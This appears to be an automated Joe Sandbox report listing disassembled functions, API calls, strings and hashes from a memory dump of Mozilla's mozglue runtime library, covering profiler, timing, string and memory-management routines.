API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 3b13a256f67a097077d2c199017e0aa014be6db9f2b271f5ea1976c3fbe6d32d
Instruction ID: 3095ba02fb84df5db29939b0bf258d733e66d8d99f74569dce67b56172d0cbff
Opcode Fuzzy Hash: 3b13a256f67a097077d2c199017e0aa014be6db9f2b271f5ea1976c3fbe6d32d
Instruction Fuzzy Hash: 52410039B012519FEF109BA8E8447AEB775FB4230CF15001DED1597B01DB329845CBA7

Function 6CBDD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBDD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CBDD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBDD52A
GetCurrentThreadId.KERNEL32 ref: 6CBDD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CBDD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBDD55F
free.MOZGLUE(00000000), ref: 6CBDD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CBDD5D3
GetCurrentThreadId.KERNEL32 ref: 6CBDD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CBDD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBDD652
GetCurrentThreadId.KERNEL32 ref: 6CBDD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CBDD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBDD6A2

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: df9a3c3d63d2e1f5af4747568386f5a7433472abdcd000c5b9a8a2d3e3ef5261
Instruction ID: 7c157a46ef34a829b6d4847e1df95ddfdb68fa4bcb51faa1c903f8ec53ed607d
Opcode Fuzzy Hash: df9a3c3d63d2e1f5af4747568386f5a7433472abdcd000c5b9a8a2d3e3ef5261
Instruction Fuzzy Hash: D0516A71604745DFC704DF35C888A9AFBB4FF89318F118A2EE89A87710DB31A949CB91

Function 6CBA5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CBA56D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CBA56E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CBA56F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CBA5744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CBA57BC
GetTickCount64.KERNEL32 ref: 6CBA58CB
EnterCriticalSection.KERNEL32(6CC0F688), ref: 6CBA58F3
__aulldiv.LIBCMT ref: 6CBA5945
LeaveCriticalSection.KERNEL32(6CC0F688), ref: 6CBA59B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CC0F638,?,?,?,?), ref: 6CBA59E9

Strings

MOZ_APP_RESTART, xrefs: 6CBA56CC

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: 34d153c8ad4df27588b934eb8b2c38ef3373da06c0574a2672170ed6b60ad99d
Instruction ID: 098df66e201892eddd4e4658dce7ef5aa33c995347462f336af765826cdf6586
Opcode Fuzzy Hash: 34d153c8ad4df27588b934eb8b2c38ef3373da06c0574a2672170ed6b60ad99d
Instruction Fuzzy Hash: 18C16B31A0C7809FD705CF68C44066EB7F1FF9A714F068A1DE8C497661D771A98ACB8A

Function 6CBCEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CB94A68), ref: 6CBC945E
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBC9470
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBC9482
Part of subcall function 6CBC9420: __Init_thread_footer.LIBCMT ref: 6CBC949F

GetCurrentThreadId.KERNEL32 ref: 6CBCEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBCEC8C

Part of subcall function 6CBC94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CBC94EE
Part of subcall function 6CBC94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CBC9508

GetCurrentThreadId.KERNEL32 ref: 6CBCECA1
AcquireSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CBCECC5
ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CBCED19
CloseHandle.KERNEL32(?), ref: 6CBCED28
free.MOZGLUE(00000000), ref: 6CBCED2F
ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6CBCEC94

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 59a53792ad4c4acf8a84585e80b07356c92b99ba0cc4fcb27765929cc337632d
Instruction ID: 608c36f1e4b06ee73338ab0b1ca13f7a793cbc760f51d2c6435543890025561e
Opcode Fuzzy Hash: 59a53792ad4c4acf8a84585e80b07356c92b99ba0cc4fcb27765929cc337632d
Instruction Fuzzy Hash: 2E21F175700198EFDF009FA4D809AAE7779EB4636DF114218FC2897B40DB369845CBA7

Function 6CBC8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6CB8EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB8EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CBCB392,?,?,00000001), ref: 6CBC91F4

Part of subcall function 6CBBCBE8: GetCurrentProcess.KERNEL32(?,6CB831A7), ref: 6CBBCBF1
Part of subcall function 6CBBCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CB831A7), ref: 6CBBCBFA

Strings

data, xrefs: 6CBC90E8
marker-chart, xrefs: 6CBC905E
marker-table, xrefs: 6CBC906C
timeline-fileio, xrefs: 6CBC90A4
timeline-memory, xrefs: 6CBC9088
timeline-overview, xrefs: 6CBC907A
stack-chart, xrefs: 6CBC90B2
timeline-ipc, xrefs: 6CBC9096
name, xrefs: 6CBC8F16

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: a73127028cf4b53dc2fd95f2ef8f3abf94ac6c7541105e02cf8389b42b589b95
Instruction ID: 6eae0b67865d248b93258fbd08f3da28ec08cdf3b0f6b1505e446762d3a983cf
Opcode Fuzzy Hash: a73127028cf4b53dc2fd95f2ef8f3abf94ac6c7541105e02cf8389b42b589b95
Instruction Fuzzy Hash: FCB1A3B1F012899BDB04CF98C4927EEBBB6EF85718F104429D515ABF80D7319949CBD2

Function 6CBAC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBAC5A3
WideCharToMultiByte.KERNEL32 ref: 6CBAC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CBAC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CBACA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBACA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBACAA5

Strings

0, xrefs: 6CBAD30A
(null), xrefs: 6CBAC596

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 33da5622e524bf43fba10dbd30f9b9617ee93e34167d4f83eab0cf93261f6803
Instruction ID: 89b56067bcd5465c4446f60f60d7dedb0a975e1343b6b4d131a2e6a0f6f103a8
Opcode Fuzzy Hash: 33da5622e524bf43fba10dbd30f9b9617ee93e34167d4f83eab0cf93261f6803
Instruction Fuzzy Hash: 93A1893060C3829FDB00DF69C59475ABBF1EF89748F04892DE8D997651DB32E806CB92

Function 6CB83480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CB83492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CB834A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CB834EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CB8350E
__Init_thread_footer.LIBCMT ref: 6CB83522
__aulldiv.LIBCMT ref: 6CB83552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CB8357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CB83592

Part of subcall function 6CBBAB89: EnterCriticalSection.KERNEL32(6CC0E370,?,?,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284), ref: 6CBBAB94
Part of subcall function 6CBBAB89: LeaveCriticalSection.KERNEL32(6CC0E370,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CBBABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6CB83508
kernel32.dll, xrefs: 6CB834EA

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 0cbca38ced7d42291e13f79e0225cce1f368bb86cdba8121c2f3d7073d2fe148
Instruction ID: a7c27828ddf74d00d73ef5a7c1ea2fcebf7ca231227302654eba5964c12fb9db
Opcode Fuzzy Hash: 0cbca38ced7d42291e13f79e0225cce1f368bb86cdba8121c2f3d7073d2fe148
Instruction Fuzzy Hash: 7C318F71B012469FDF04DFB9C868ABEB7B9FB45304F11001DE515A3690EB71E945CBA1

Function 6CB84480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6CBC4843,?), ref: 6CB845F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6CBC4843,?), ref: 6CB8468A
free.MOZGLUE(?,?,?,?,?,?,6CBC4843,?), ref: 6CB846C9
free.MOZGLUE(?), ref: 6CB846EF
free.MOZGLUE(?), ref: 6CB84712
free.MOZGLUE(?), ref: 6CB84735
free.MOZGLUE(?), ref: 6CB84758
free.MOZGLUE(?), ref: 6CB8477B
free.MOZGLUE(?), ref: 6CB8479E

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 99c2be7271b8039ac0cc0c1da7afadddefa562839d53facac1af8de4e458ab8c
Instruction ID: 00ff629114f890e41e2358e89d9e27c09d7104bf9c1d425a7d46b6a387657ce9
Opcode Fuzzy Hash: 99c2be7271b8039ac0cc0c1da7afadddefa562839d53facac1af8de4e458ab8c
Instruction Fuzzy Hash: ACB1F371A061908FDB18CF6CC8B076D77AAEF42328F584668E416DBBC6D73099448F92

Function 6CBEAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6CBEAC52
CreateFileMappingW.KERNEL32 ref: 6CBEAC7D
GetSystemInfo.KERNEL32 ref: 6CBEAC98
MapViewOfFile.KERNEL32 ref: 6CBEACB0
GetSystemInfo.KERNEL32 ref: 6CBEACCD
MapViewOfFile.KERNEL32 ref: 6CBEAD05
UnmapViewOfFile.KERNEL32 ref: 6CBEAD1C
CloseHandle.KERNEL32 ref: 6CBEAD28
UnmapViewOfFile.KERNEL32 ref: 6CBEAD37
CloseHandle.KERNEL32 ref: 6CBEAD43
CloseHandle.KERNEL32 ref: 6CBEAD67

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 73c5dccfa906c43123a571b275a11bbbefdd79f8fe8649e1e9dd25c98394e870
Instruction ID: 86d6add80558bc7591d8fa8e9652c3f3ad962b5f80f9be97209e5bcc0655d9a0
Opcode Fuzzy Hash: 73c5dccfa906c43123a571b275a11bbbefdd79f8fe8649e1e9dd25c98394e870
Instruction Fuzzy Hash: 56315FB1A047458FDB00EF78D64826EBBF4FF85705F02892DE99997351EB709488CB82

Function 6CB99620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CB99675
__Init_thread_footer.LIBCMT ref: 6CB99697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CB996E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CB99707
__Init_thread_footer.LIBCMT ref: 6CB9971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CB99773

Part of subcall function 6CBBAB89: EnterCriticalSection.KERNEL32(6CC0E370,?,?,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284), ref: 6CBBAB94
Part of subcall function 6CBBAB89: LeaveCriticalSection.KERNEL32(6CC0E370,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CBBABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CB997B7
FreeLibrary.KERNEL32 ref: 6CB997D0
FreeLibrary.KERNEL32 ref: 6CB997EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CB99824

Strings

NtMapViewOfSection, xrefs: 6CB99701
ntdll.dll, xrefs: 6CB996E3
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6CB99670
MapViewOfFileNuma2, xrefs: 6CB997B1

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: a7ad53a4b28b21312648a8c26e08374ecf178523109f6d96518b6612216c3166
Instruction ID: ead0a164a4f15baf21586d3a47bc8778f850accf4cc8c4c0683bac0a9e12d4c0
Opcode Fuzzy Hash: a7ad53a4b28b21312648a8c26e08374ecf178523109f6d96518b6612216c3166
Instruction Fuzzy Hash: A941A070B002459FDF00CFACD884A9A77B4FB4A755F12412CED1997740EB32A884CFA2

Function 6CB81E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC0E784), ref: 6CB81EC1
LeaveCriticalSection.KERNEL32(6CC0E784), ref: 6CB81EE1
EnterCriticalSection.KERNEL32(6CC0E744), ref: 6CB81F38
LeaveCriticalSection.KERNEL32(6CC0E744), ref: 6CB81F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CB81F83
LeaveCriticalSection.KERNEL32(6CC0E784), ref: 6CB81FC0
EnterCriticalSection.KERNEL32(6CC0E784), ref: 6CB81FE2
LeaveCriticalSection.KERNEL32(6CC0E784), ref: 6CB81FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB82019

Strings

MOZ_CRASH(), xrefs: 6CB82000

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: MOZ_CRASH()
API String ID: 2055633661-2608361144
Opcode ID: bb8d6a746071f2cc19444d70d32773ee33740cda4a5bc0aa2bccb41032cd2465
Instruction ID: 42e068acb75f2ddcee6724af3bca2fba814bcb77de59d4d5b5913e69c02b923f
Opcode Fuzzy Hash: bb8d6a746071f2cc19444d70d32773ee33740cda4a5bc0aa2bccb41032cd2465
Instruction Fuzzy Hash: A241C171B423568BDF008F6CC888B6E76B5EF49349F05012DE96597741EB7298048BD2

Function 6CB97E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB97EA7
malloc.MOZGLUE(00000001), ref: 6CB97EB3

Part of subcall function 6CB9CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CB9CB49
Part of subcall function 6CB9CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CB9CBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CB97EC4
mozalloc_abort.MOZGLUE(?), ref: 6CB97F19
malloc.MOZGLUE(?), ref: 6CB97F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB97F4D

Strings

d, xrefs: 6CB97F89

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 09566bf701128d6efc3f5bf5c61d9951109432a767c11051c3d075fd1183352b
Instruction ID: 6163da188a55c035173b2d8f0eb76331abecf1d9eeafb2ef2307a9ba1ed93f7c
Opcode Fuzzy Hash: 09566bf701128d6efc3f5bf5c61d9951109432a767c11051c3d075fd1183352b
Instruction Fuzzy Hash: B731E561E006C89BEB009F78DC445FEB7B8EF96208F455229EC5967712FB71A5C8C391

Function 6CB93E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6CB93CCC), ref: 6CB93EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CB93FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6CB93CCC), ref: 6CB94006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CB940A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CB93CCC), ref: 6CB940AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CB93CCC), ref: 6CB940C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CB94134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CB93CCC), ref: 6CB94143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CB93CCC), ref: 6CB94157

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 298048982c5c62e397c532e4d01bd4a2d705ce4cae24e0c1667c4ff2f0b7f364
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 69A19DB1A00255CFDB50CF28C88075ABBB9FF49308F2541A9D919AF752D771E986CFA0

Function 6CBD9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBD8273), ref: 6CBD9D65
free.MOZGLUE(6CBD8273,?), ref: 6CBD9D7C
free.MOZGLUE(?,?), ref: 6CBD9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CBD9E0F
free.MOZGLUE(6CBD946B,?,?), ref: 6CBD9E24
free.MOZGLUE(?,?,?), ref: 6CBD9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CBD9EC8
free.MOZGLUE(6CBD946B,?,?,?), ref: 6CBD9EDF
free.MOZGLUE(?,?,?,?), ref: 6CBD9EF5

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

